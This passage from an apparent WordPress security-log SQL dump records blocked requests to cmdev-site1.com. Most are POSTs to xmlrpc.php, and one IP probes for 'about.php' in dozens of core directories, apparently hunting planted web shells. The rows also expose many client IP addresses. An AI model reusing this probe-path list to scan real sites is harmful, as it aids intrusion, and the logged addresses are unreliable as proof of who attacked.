Firefox\\/1.0.6\"}','xchboCDT2R5UJGqtmBfX4r8j',0,1680951968.0401,1007,'','POST',403,0,515,0,1,'',0),('45.130.104.194',763521218,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','n7EFOJXxqTbcYQa0rUPIkhpv',0,1680951968.7544,821,'','POST',403,0,515,0,1,'',0),('104.152.110.52',1754820148,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko\\/20100101 Firefox\\/85.0\"}','aMNuyQEV3zrK6FdwOtxX0mS5',0,1680951980.0817,635,'','POST',403,0,515,0,1,'',0),('2.58.47.203',37367755,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','t1AFZRfrXix4PJnW0g8jkvQH',0,1680954512.6595,3843,'','POST',403,0,515,0,1,'',0),('213.152.187.195',3583556547,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','6WYUCbyO3V4nrztKeSc59isd',0,1680954580.0132,587,'','POST',403,0,515,0,1,'',0),('192.145.126.115',3230760563,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','eWEFRwCJlmgIk1Si6rt7hMVY',0,1680954732.0477,3503,'','POST',403,0,515,0,1,'',0),('67.198.116.43',1137079339,'','http://cmdev-site1.com/the-wild-hunt/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.0.0 Safari\\/537.36\",\"2\":\"http:\\/\\/cmdev-site1.com\\/the-wild-hunt\\/?loggedout=true\"}','fJ603SaVLItEdABqFb8ZlPng',3,1680957678.8011,422,'','POST',302,0,600,0,1,'',510),('185.206.225.51',3117343027,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','I3ZMy2c7wDF1eflPnhYxbJsN',0,1680958215.9348,1715,'','POST',403,0,515,0,1,'',0),('213.152.161.170',3583549866,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','DXHIqcLoPEgQnbATy97SFWkz',0,1680958261.6362,555,'','POST',403,0,515,0,1,'',0),('185.206.225.51',3117343027,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','rRDfh8tMqz2uew6ndlcSU7iF',0,1680958502.8850,1321,'','POST',403,0,515,0,1,'',0),('62.102.148.160',1046910112,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','duXzgpUN8maDvqrokI3TPSc7',0,1680959575.1874,921,'','POST',403,0,515,0,1,'',0),('104.215.82.71',1758941767,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko\\/20100101 Firefox\\/60.0\"}','XYwdokFWMsfgG1B8tZ7ai5ED',0,1680959961.9156,611,'','POST',403,0,515,0,1,'',0),('5.9.220.53',84532277,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','XYFexu78mN2Vt9iPjg36sflJ',0,1680959963.0079,561,'','POST',403,0,515,0,1,'',0),('210.65.139.75',3527510859,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','rysSUTCVZB4eGf0kKqcJR8XO',0,1680959964.4851,565,'','POST',403,0,515,0,1,'',0),('92.205.17.155',1556943259,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','PcQt0zKJ2WXL1YqO4M75UHmd',0,1680959980.0690,1557,'','POST',403,0,515,0,1,'',0),('45.140.185.41',764197161,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko\\/20100101 Firefox\\/44.0\"}','PNxzaysSMhiC1WXpfF6tZmR8',0,1680959986.0640,1391,'','POST',403,0,515,0,1,'',0),('35.156.214.100',597481060,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko\\/20050716 Firefox\\/1.0.6\"}','FytkAEUIhaQSe5W4dZ7MCHXR',0,1680959995.8628,1215,'','POST',403,0,515,0,1,'',0),('213.165.236.212',3584421076,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','8pmcX04b6w2iCPTv9k3Ys7Be',0,1680960057.6665,589,'','POST',403,0,515,0,1,'',0),('66.29.132.22',1109230614,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.186 Safari\\/537.36\"}','OnAeNdGX4gP873LfHQYpzT2k',0,1680960058.9416,592,'','POST',403,0,515,0,1,'',0),('207.180.210.110',3484734062,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','fVWL80BxCni6cOt7FJQmlIkq',0,1680960063.3537,564,'','POST',403,0,515,0,1,'',0),('103.9.227.178',1728701362,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko\\/20100101 Firefox\\/17.0\"}','pZvW1mLG74SU9efNbQ38qD6n',0,1680960074.9941,536,'','POST',403,0,515,0,1,'',0),('103.92.235.82',1734142802,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','7aCxdzt4Ao9yrHmDZjU5ks3Q',0,1680960077.5575,891,'','POST',403,0,515,0,1,'',0),('103.159.36.10',1738482698,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','1AsS5kXnNctpCTOvVbLi08JP',0,1680960078.1432,792,'','POST',403,0,515,0,1,'',0),('1.20.253.226',18152930,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko\\/20050915 Firefox\\/1.0.7\"}','WYjFHbBATsk8Iz7flSGMyrPi',0,1680960086.3661,950,'','POST',403,0,515,0,1,'',0),('79.170.40.178',1336551602,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','sAe0WfbnvLFj7qC4MZYlButw',0,1680960088.7902,552,'','POST',403,0,515,0,1,'',0),('81.208.11.40',1372588840,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','If1ObSlpnqYda0WKTNtXGhMV',0,1680960091.5504,1329,'','POST',403,0,515,0,1,'',0),('173.44.55.179',2905356211,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','zAxsRmjd7Lo8ugnJZPqkK9VT',0,1680960509.3247,661,'','POST',403,0,515,0,1,'',0),('194.59.206.66',3258699330,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','Cr6VnqwhvAIdJxz8uYWtT34F',0,1680960951.9991,1817,'','POST',403,0,515,0,1,'',0),('91.107.196.183',1533789367,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\"}','dZCEetTsOgJzHwAxMQNDV3Sp',0,1680960950.8145,3226,'','POST',403,0,515,0,1,'',0),('130.69.94.131',2185584259,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.141 Safari\\/537.36\"}','Lals5cvdR0ikZmG27xCFhuD1',0,1680960957.5511,672,'','POST',403,0,515,0,1,'',0),('185.163.200.46',3114518574,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko\\/20100101 Firefox\\/47.0\"}','uSyjeGshdJL1crmZ3VbpXioW',0,1680960968.2672,628,'','POST',403,0,515,0,1,'',0),('15.206.123.128',265190272,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','uvTGO7ZekjAWy4caJrKnSpP2',0,1680963217.0594,2643,'','POST',403,0,515,0,1,'',0),('45.130.104.194',763521218,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','QkReSVsu24nLrWUP5tmIlxd0',0,1680963222.0757,577,'','POST',403,0,515,0,1,'',0),('45.130.104.194',763521218,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','kbghUQFVjY7xfMo8lWs56zKm',0,1680963225.5934,573,'','POST',403,0,515,0,1,'',0),('207.154.253.117',3483041141,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko\\/20041107 Firefox\\/1.0\"}','H5XmhcyvkNbYZOx0EIu8WDAK',0,1680963232.6210,655,'','POST',403,0,515,0,1,'',0),('209.188.18.190',3518763710,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko\\/20041107 Firefox\\/1.0\"}','bMeyzmagSo5H2I7N38RYvJQs',0,1680963237.0025,593,'','POST',403,0,515,0,1,'',0),('94.237.124.100',1592622180,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/83.0.4103.116 Safari\\/537.36\"}','h1VyaXqlOcmST9pEKH8L7FGY',0,1680963247.7459,1557,'','POST',403,0,515,0,1,'',0),('178.238.229.54',3002000694,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','cobDAQ1gWVBMsnifhGEk56tj',0,1680963754.1045,889,'','POST',403,0,515,0,1,'',0),('111.231.4.211',1877411027,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','jdZfqnOMX6Hx9cKBNuEIW2bJ',0,1680964225.6186,619,'','POST',403,0,515,0,1,'',0),('68.183.144.184',1152880824,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','TYjBL06iNyWvXsECgZq1HMOo',0,1680964229.7880,617,'','POST',403,0,515,0,1,'',0),('159.203.161.65',2680922433,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','oHsFJeTzLCwUGQaPvmi4Scf6',0,1680964239.4409,645,'','POST',403,0,515,0,1,'',0),('45.140.185.41',764197161,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko\\/20100101 Firefox\\/40.1\"}','WqY5NmCU8Bta0kRXox6dcijg',0,1680964253.1394,2706,'','POST',403,0,515,0,1,'',0),('188.68.47.117',3158585205,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','R5JwXZOGM1QctrshjPB9VA07',0,1680964253.4251,2420,'','POST',403,0,515,0,1,'',0),('163.172.168.158',2746001566,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko\\/20100101 Firefox\\/17.0\"}','onrXG3qHbQfOCgMUKzesRBxS',0,1680964259.3760,716,'','POST',403,0,515,0,1,'',0),('109.169.53.7',1839805703,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko\\/20100101 Firefox\\/18.0\"}','UwtCi2mOkjvxlp70JVDNBefb',0,1680964264.2268,593,'','POST',403,0,515,0,1,'',0),('103.142.25.164',1737365924,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:36.0) Gecko\\/20100101 Firefox\\/36.0\"}','5HK8dxD0X9sOmabLeuZJRgvP',0,1680964264.9990,603,'','POST',403,0,515,0,1,'',0),('193.47.61.30',3241098526,'','http://cmdev-site1.com/wp-admin/includes/about.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','NWsqjr8MeRwK6X9PZvcOFH4z',0,1680965319.5934,315,'','GET',403,0,700,0,1,'',0),('193.47.61.30',3241098526,'','http://cmdev-site1.com/wp-includes/about.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','HPv0zNSWTkEVDoaLqI4XJCMY',0,1680965323.0925,273,'','GET',403,0,700,0,1,'',0),('193.47.61.30',3241098526,'','http://cmdev-site1.com/css/about.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','FPCZROkl4t28Bf0dxzicbEmw',0,1680965335.2662,340,'','GET',403,0,700,0,1,'',0),('193.47.61.30',3241098526,'','http://cmdev-site1.com/images/about.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','1VmrA2tax85uJZGsMoYciHRy',0,1680965339.9291,324,'','GET',403,0,700,0,1,'',0),('193.47.61.30',3241098526,'','http://cmdev-site1.com/wp-content/languages/plugins/about.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','F6aLUNCf0D4X3KmOtheWJ9dR',0,1680965343.5520,712,'','GET',403,0,700,0,1,'',0),('193.47.61.30',3241098526,'','http://cmdev-site1.com/wp-includes/images/about.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','bNTlcnSd281iPwLW7uGC9ZXq',0,1680965354.2170,288,'','GET',403,0,700,0,1,'',0),('193.47.61.30',3241098526,'','http://cmdev-site1.com/wp-content/languages/about.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','IsbBgEkfq0H49Ppw6KiLNOuh',0,1680965364.7247,328,'','GET',403,0,700,0,1,'',0),('193.47.61.30',3241098526,'','http://cmdev-site1.com/wp-content/upgrade/about.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','j9OqnCrEpBSR3NV1yt7PDFQa',0,1680965366.8371,280,'','GET',403,0,700,0,1,'',0),('193.47.61.30',3241098526,'','http://cmdev-site1.com/wp-content/uploads/about.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','hlZHyP4B2DatL0Jnfg7vVbIK',0,1680965367.9924,283,'','GET',403,0,700,0,1,'',0),('193.47.61.30',3241098526,'','http://cmdev-site1.com/wp-admin/js/about.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','Lwg83ANMqJybCeGxnPuaFBfj',0,1680965374.8897,278,'','GET',403,0,700,0,1,'',0),('193.47.61.30',3241098526,'','http://cmdev-site1.com/wp-admin/css/about.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','FL7P4NYtOepWhg1xCs3dqzDT',0,1680965375.9143,294,'','GET',403,0,700,0,1,'',0),('193.47.61.30',3241098526,'','http://cmdev-site1.com/wp-admin/css/colors/about.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','BajAL0sT148WP3lDQIkYn5Uv',0,1680965377.2495,277,'','GET',403,0,700,0,1,'',0),('193.47.61.30',3241098526,'','http://cmdev-site1.com/wp-admin/maint/about.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','juAZDe6qMSkOvy1mUNIdcJ8L',0,1680965379.8968,296,'','GET',403,0,700,0,1,'',0),('193.47.61.30',3241098526,'','http://cmdev-site1.com/wp-content/about.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','e9KugfXYkE1rBmdNh05pJWnS',0,1680965381.3866,309,'','GET',403,0,700,0,1,'',0),('193.47.61.30',3241098526,'','http://cmdev-site1.com/wp-admin/css/colors/blue/about.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','OW8hbY0VXcyxLSEPHmRNeGt9',0,1680965387.2981,315,'','GET',403,0,700,0,1,'',0),('193.47.61.30',3241098526,'','http://cmdev-site1.com/wp-admin/css/colors/coffee/about.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','nzHYeMgoRk6ZO4aAJbWpXyLj',0,1680965397.7537,289,'','GET',403,0,700,0,1,'',0),('193.47.61.30',3241098526,'','http://cmdev-site1.com/wp-admin/css/colors/ectoplasm/about.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','e6buZM5vE8ymxBAK9dt0krNo',0,1680965399.6146,282,'','GET',403,0,700,0,1,'',0),('193.47.61.30',3241098526,'','http://cmdev-site1.com/wp-admin/css/colors/midnight/about.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','WBH7zQ92CLoguDNdxjkvZSRU',0,1680965402.4094,545,'','GET',403,0,700,0,1,'',0),('193.47.61.30',3241098526,'','http://cmdev-site1.com/wp-admin/css/colors/modern/about.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','KbXBd0rsQoxegHn7WtvqRFac',0,1680965407.2023,422,'','GET',403,0,700,0,1,'',0),('193.47.61.30',3241098526,'','http://cmdev-site1.com/wp-admin/images/about.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','jfH7CnogTa9GLWsBeQwzbqON',0,1680965428.0108,581,'','GET',403,0,700,0,1,'',0),('193.47.61.30',3241098526,'','http://cmdev-site1.com/wp-admin/css/colors/ocean/about.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','0xprwSQdfnYhXj8ai4oPN1K7',0,1680965431.4541,283,'','GET',403,0,700,0,1,'',0),('193.47.61.30',3241098526,'','http://cmdev-site1.com/wp-admin/js/widgets/about.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','RLiXcbGKW1FfAJ6ZwrVxDQgI',0,1680965434.2516,281,'','GET',403,0,700,0,1,'',0),('193.47.61.30',3241098526,'','http://cmdev-site1.com/wp-includes/customize/about.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','KXvJUacFoH3VOyszwfhbqD74',0,1680965436.0959,284,'','GET',403,0,700,0,1,'',0),('193.47.61.30',3241098526,'','http://cmdev-site1.com/wp-includes/pomo/about.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','6XEsYjw75qRLP1bhSiIvkyfG',0,1680965442.6380,316,'','GET',403,0,700,0,1,'',0),('193.47.61.30',3241098526,'','http://cmdev-site1.com/wp-includes/ID3/about.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','LPjIc7AmrWHVbxXsw8hU04DM',0,1680965454.1032,275,'','GET',403,0,700,0,1,'',0),('193.47.61.30',3241098526,'','http://cmdev-site1.com/wp-includes/IXR/about.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','nmUVxqwPNIDkYdolzeFG9Zys',0,1680965460.4022,279,'','GET',403,0,700,0,1,'',0),('193.47.61.30',3241098526,'','http://cmdev-site1.com/wp-includes/PHPMailer/about.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','JqL5pvGm8kCycu4tWeYFXMSd',0,1680965462.4422,627,'','GET',403,0,700,0,1,'',0),('193.47.61.30',3241098526,'','http://cmdev-site1.com/wp-includes/Requests/about.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','2cBedxQnApkX4GvVoH93CLJw',0,1680965466.9522,280,'','GET',403,0,700,0,1,'',0),('193.47.61.30',3241098526,'','http://cmdev-site1.com/wp-includes/SimplePie/about.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','7L9KcwyETf4YO58RpGuDjqUx',0,1680965480.3057,304,'','GET',403,0,700,0,1,'',0),('193.47.61.30',3241098526,'','http://cmdev-site1.com/wp-includes/Text/about.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','aRdZpM6jObe9lUq0Vhr1ANLf',0,1680965487.2367,301,'','GET',403,0,700,0,1,'',0),('193.47.61.30',3241098526,'','http://cmdev-site1.com/wp-includes/assets/about.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie 